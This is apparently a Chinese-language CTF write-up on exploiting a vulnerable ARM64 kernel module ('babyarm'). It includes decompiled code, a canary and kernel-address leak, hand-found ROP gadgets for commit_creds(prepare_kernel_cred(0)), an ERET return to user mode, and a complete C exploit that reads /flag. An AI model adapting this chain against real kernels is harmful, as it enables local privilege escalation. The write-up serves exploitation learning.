0%

ARM kernel pwn初探

babyarm 复现

1
2
3
4
5
6
7
8
9
10
timeout --foreground 60 qemu-system-aarch64 \
-m 128M \
-machine virt \
-cpu max \
-kernel ./Image \
-append "console=ttyAMA0 loglevel=3 oops=panic panic=1" \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-smp cores=1,threads=1 \
-nographic
  • 没有给定nokaslr,默认开启地址随机化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/sh

mount -t devtmpfs none /dev
mount -t proc none /proc
mount -t sysfs none /sys

insmod /home/pwn/demo.ko
chown -R 1000:1000 /home/pwn

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/perf_event_paranoid
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

cd /home/pwn
setsid cttyhack setuidgid 1000 sh

umount /proc

poweroff -f
  • dmesg_restrict
  • kptr_restrict
  • perf_event_paranoid

漏洞分析

IDA 分析内核模块发现就只有 device_writedevice_read 有用,但这两个函数都很乱

再加上对 ARM 架构不熟悉,逆向的过程花费了我不少时间,下面是我的思考过程:

函数 device_write

1
2
3
4
__int64 v21; // [xsp+B8h] [xbp+B8h]

StatusReg = _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0));
v21 = *(_QWORD *)(StatusReg + 0x480);
  • 从位置上开看 v21 应该是 canary
  • 那前面的 _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0)) 就是用来生成 canary 的

然后就到了我感觉最抽象的一段代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
if ( (*(_DWORD *)(StatusReg + 0x2C) & 0x200000) != 0
|| (v19 = *(_QWORD *)StatusReg, v8 = (unsigned __int64)buf, (v19 & 0x4000000) != 0) )
{
v8 = (unsigned __int64)buf & ((__int64)((_QWORD)buf << 8) >> 8);
}
v9 = 0xFFFFFFFFFFFFLL;
_CF = __CFADD__(v8, len);
v11 = v8 + len;
if ( v11 != 0 && _CF )
v9 = 0LL; // △
if ( _CF )
v11 = -1LL;
if ( (v11 != v9 + !_CF) & __CFSUB__(v11, v9, _CF) )
v12 = 0LL;
else // △
v12 = 1LL;
if ( v12 ) // △
{
if ( ((unsigned __int64)buf & ((__int64)((_QWORD)buf << 8) >> 8) & 0xFFFF000000000000LL) != 0 )
v13 = 0LL;
else
v13 = buf;
__asm { HINT #0x14 }
v17 = _arch_copy_from_user(demo_buf, v13, len);// 成功返回'0'
}
else
{
v17 = len;
}
if ( v17 ) // △
{
memset(&demo_buf[len - v17], 0, v17);
return 0xFFFFFFFFFFFFFFEALL; // 返回错误码
}
else
{
_memcpy(tmp, demo_buf);
return len;
}
  • demo_buf 的范围远比 tmp 大,因此有栈溢出

这段代码有很多未命名变量,宏定义,还有很多 if-else 语句,但我们可以从后向前分析:

  • 为了不让程序返回错误码 0xFFFFFFFFFFFFFFEALL,以上各个 if-else 语句都只能按照 “△” 标注的路线回溯
  • 直到第一个 if 执行:
1
2
3
4
if ( (*(_DWORD *)(StatusReg + 0x2C) & 0x200000) != 0
|| (v19 = *(_QWORD *)StatusReg,
v8 = (unsigned __int64)buf,
(v19 & 0x4000000) != 0) )

感觉程序在检查一些环境,没有实质性的操作,写一个 test.c 进行调试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

size_t user_sp_v;
size_t *user_sp = &user_sp_v;

int main()
{
int buf[0x200] = {0};
int fd = open("/proc/demo", O_RDWR);

write(fd, buf, 0x200);
return 0;
}
  • 可以通过 /sys/module/demo/sections/.text 获取模块 .text 基地址
1
2
/home/pwn # cat /sys/module/demo/sections/.text
0xffffbcf41c9e3000
1
2
3
4
5
6
7
0xffffbe24d4559090    bl     #0xffffbe24da88b200           <0xffffbe24da88b200>

0xffffbe24da88b200 hint #0x22
0xffffbe24da88b204 add x5, x0, x2
0xffffbe24da88b208 mov x15, x1
0xffffbe24da88b20c mov x6, x0
0xffffbe24da88b210 cmp x2, #0x10
  • 其实到 _arch_copy_from_user(demo_buf, v13, len) 执行之前的操作都没有什么影响,可以直接忽略

函数 device_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
canary = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0)) + 0x480);
if ( length > 0x1000 )
return device_read_0((file *)length, buffer, length, 0LL);
_memcpy(demo_buf, tmp);
StatusReg = _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0));
if ( (*(_DWORD *)(StatusReg + 44) & 0x200000) != 0
|| (v7 = (unsigned __int64)buffer, (*(_QWORD *)StatusReg & 0x4000000) != 0) )
{
v7 = (unsigned __int64)buffer & ((__int64)((_QWORD)buffer << 8) >> 8);
}
v8 = 0xFFFFFFFFFFFFLL;
_CF = __CFADD__(v7, length);
v10 = v7 + length;
if ( v10 != 0 && _CF )
v8 = 0LL;
if ( _CF )
v10 = -1LL;
if ( (v10 != v8 + !_CF) & __CFSUB__(v10, v8, _CF) )
v11 = 0LL;
else
v11 = 1LL;
v12 = length;
if ( v11 )
{
if ( ((unsigned __int64)buffer & ((__int64)((_QWORD)buffer << 8) >> 8) & 0xFFFF000000000000LL) != 0 )
v15 = 0LL;
else
v15 = buffer;
__asm { HINT #0x14 }
v12 = _arch_copy_to_user(v15, demo_buf, length);
}

  • 由于 tmp 和 canary 靠得很近,这里可以把 canary 拷贝到 demo_buf 中

入侵思路

栈溢出和泄露 canary 都很简单,关键是怎么提取并且回到用户态

程序开了 smep 因此只能写 ROP,第一个 gadget 需要完成栈迁移的工作

常规获取 gadget 的工具 ropper/ROPgadget 不能使用:

1
2
filebytes.binary.BinaryError: Bad architecture
ropper --file ./Image --nocolor > g1 0.40s user 0.09s system 99% cpu 0.491 total
1
[Error] PE.getArch() - Bad Arch
  • 这就需要手动找 Gadget 了

内核里有个好用的 gadget:

1
2
3
4
5
6
7
8
.text:0000000000016950 00 00 80 52                   MOV             W0, #0
.text:0000000000016954 F3 53 41 A9 LDP X19, X20, [SP,#0x50+var_40]
.text:0000000000016958 F5 5B 42 A9 LDP X21, X22, [SP,#0x50+var_30]
.text:000000000001695C F7 63 43 A9 LDP X23, X24, [SP,#0x50+var_20]
.text:0000000000016960 F9 23 40 F9 LDR X25, [SP,#0x50+var_10]
.text:0000000000016964 FD 7B C5 A8 LDP X29, X30, [SP+0x50+var_50],#0x50
.text:0000000000016968 C0 03 5F D6 RET

这里有一个小坑需要注意:ARM 的 ret 指令和 x86 的有很大不同

  • 执行 ret 之后,会把 LR 寄存器里的值赋值给 PC(注意,不是栈)

因此构造 ROP 链时的核心就是通过栈来控制 LR(X30) 寄存器:

  • 控制 X19 为 prepare_kernel_cred+4
  • 控制 X30 为 commit_creds+4
  • 执行 ret 时就可以执行 commit_creds(prepare_kernel_cred(0))

后续需要考虑返回用户态的问题:

ARM64使用 SVC 指令进入内核态,使用 ERET 指令返回用户态,ARM 在进入内核态之前会保存用户态所有寄存器状态,在返回时恢复

其中比较重要的寄存器有 SP_EL0、ELR_EL1、SPSR_EL1:

  • SP_EL0:保存用户态的栈指针
  • ELR_EL1:保存要返回的用户态 PC 指针
  • SPSR_EL1:保存 0x80001000

可以用下面这个 gadget 来填充上述数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
.text:0000000000011FE4 17 41 18 D5                   MSR             #0, c4, c1, #0, X23 /* msr	sp_el0, x23 */
.text:0000000000011FE8 DF 02 7C F2 TST X22, #0x10
.text:0000000000011FEC 40 00 00 54 B.EQ loc_11FF4
.text:0000000000011FEC
.text:0000000000011FF0 1F 20 03 D5 NOP
.text:0000000000011FF0
.text:0000000000011FF4
.text:0000000000011FF4 loc_11FF4 ; CODE XREF: sub_157D0-37E4↑j
.text:0000000000011FF4 80 B7 46 F9 LDR X0, [X28,#0xD68]
.text:0000000000011FF8 0B 00 00 14 B loc_12024
.text:0000000000011FF8
.text:0000000000011FF8 ; END OF FUNCTION CHUNK FOR sub_157D0
.text:0000000000011FFC
.text:0000000000011FFC ; =============== S U B R O U T I N E =======================================
.text:0000000000011FFC
.text:0000000000011FFC
.text:0000000000011FFC sub_11FFC
.text:0000000000011FFC
.text:0000000000011FFC ; FUNCTION CHUNK AT .text:0000000000012024 SIZE 00000050 BYTES
.text:0000000000011FFC
.text:0000000000011FFC C1 BF 00 D0 21 A0 00 91 ADRL X1, unk_180B028
.text:0000000000012004 80 D0 38 D5 MRS X0, #0, c13, c0, #4
.text:0000000000012008 21 68 60 F8 LDR X1, [X1,X0]
.text:000000000001200C C1 00 00 B4 CBZ X1, loc_12024
.text:000000000001200C
.text:0000000000012010 81 03 40 F9 LDR X1, [X28]
.text:0000000000012014 81 00 C8 37 TBNZ W1, #0x19, loc_12024
.text:0000000000012014
.text:0000000000012018 E0 3F 01 32 MOV W0, #0x80007FFF
.text:000000000001201C 01 00 80 52 MOV W1, #0
.text:0000000000012020 1F 20 03 D5 NOP
.text:0000000000012020
.text:0000000000012020 ; End of function sub_11FFC
.text:0000000000012020
.text:0000000000012024 ; START OF FUNCTION CHUNK FOR sub_157D0
.text:0000000000012024 ; ADDITIONAL PARENT FUNCTION sub_11FFC
.text:0000000000012024
.text:0000000000012024 loc_12024 ; CODE XREF: sub_157D0-37D8↑j
.text:0000000000012024 ; sub_11FFC+10↑j
.text:0000000000012024 ; sub_11FFC+18↑j
.text:0000000000012024 35 40 18 D5 MSR #0, c4, c0, #1, X21 /* msr elr_el1, x21 */
.text:0000000000012028 16 40 18 D5 MSR #0, c4, c0, #0, X22 /* msr spsr_el1, x22 */
.text:000000000001202C E0 07 40 A9 LDP X0, X1, [SP,#arg_0]
.text:0000000000012030 E2 0F 41 A9 LDP X2, X3, [SP,#arg_10]
.text:0000000000012034 E4 17 42 A9 LDP X4, X5, [SP,#arg_20]
.text:0000000000012038 E6 1F 43 A9 LDP X6, X7, [SP,#arg_30]
.text:000000000001203C E8 27 44 A9 LDP X8, X9, [SP,#arg_40]
.text:0000000000012040 EA 2F 45 A9 LDP X10, X11, [SP,#arg_50]
.text:0000000000012044 EC 37 46 A9 LDP X12, X13, [SP,#arg_60]
.text:0000000000012048 EE 3F 47 A9 LDP X14, X15, [SP,#arg_70]
.text:000000000001204C F0 47 48 A9 LDP X16, X17, [SP,#arg_80]
.text:0000000000012050 F2 4F 49 A9 LDP X18, X19, [SP,#arg_90]
.text:0000000000012054 F4 57 4A A9 LDP X20, X21, [SP,#arg_A0]
.text:0000000000012058 F6 5F 4B A9 LDP X22, X23, [SP,#arg_B0]
.text:000000000001205C F8 67 4C A9 LDP X24, X25, [SP,#arg_C0]
.text:0000000000012060 FA 6F 4D A9 LDP X26, X27, [SP,#arg_D0]
.text:0000000000012064 FC 77 4E A9 LDP X28, X29, [SP,#arg_E0]
.text:0000000000012068 FE 7B 40 F9 LDR X30, [SP,#arg_F0]
.text:000000000001206C FF 43 05 91 ADD SP, SP, #0x150
.text:0000000000012070 E0 03 9F D6 ERET

最后需要注意:不能执行 system("/bin/sh"),会触发缺页机制

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

size_t user_sp_v;
size_t *user_sp = &user_sp_v;
char* tmpbuf[0x1000];

size_t canary;
size_t kernel_addr;
size_t kernel_base;
size_t offset;
size_t commit_creds = 0xffff8000080a2258;
size_t prepare_kernel_cred = 0xffff8000080a24f8;
size_t gadget1 = 0xffff800008011fe4;
size_t gadget2 = 0xffff800008016950;

void save_status()
{
asm("mov x11, %0" : : "r" (user_sp));
asm("mov x12, sp");
asm("str x12, [x11]");
}

void get_root()
{
asm("mov x11, %0" : : "r" (user_sp));
asm("ldr x12, [x11]");
asm("mov sp, x12");

printf("root");
//system("/bin/sh");
int fd = open("/flag", 0);
read(fd, tmpbuf, 0x40);
write(1, tmpbuf, 0x40);
}

int main()
{
save_status();
size_t buf[0x200] = {0};
int fd = open("/proc/demo", O_RDWR);

read(fd, buf, 0x200);
canary = buf[12];
kernel_addr = buf[2];
printf("canary: 0x%llx\n",canary);
printf("kernel_addr: 0x%llx\n",kernel_addr);

offset = kernel_addr - 0xffff8000082376f8;
kernel_base = 0xffff800008000000 + offset;
printf("kernel_base: 0x%lx\n",kernel_base);

commit_creds = commit_creds + offset;
prepare_kernel_cred = prepare_kernel_cred + offset;

gadget1 = gadget1 + offset;
gadget2 = gadget2 + offset;

printf("gadget1: 0x%lx\n",gadget1);
printf("gadget2: 0x%lx\n",gadget2);
//sleep(2);

buf[16] = canary;

buf[18] = gadget2;
buf[22] = prepare_kernel_cred+4; // X19
buf[26] = 0;
buf[32] = commit_creds+4; // X30

buf[36] = gadget2;
buf[42] = gadget1;

buf[45] = get_root;
buf[46] = 0x80001000;
buf[47] = buf;

write(fd, buf, 0x200);
close(fd);
return 0;
}


小结:

第一次打 ARM 的内核题目,调试很久找不到 gadget,最后的 gadget 还是抄的别人的

太菜了,现在找 gadget 还很迷茫,以后有经验了再总结吧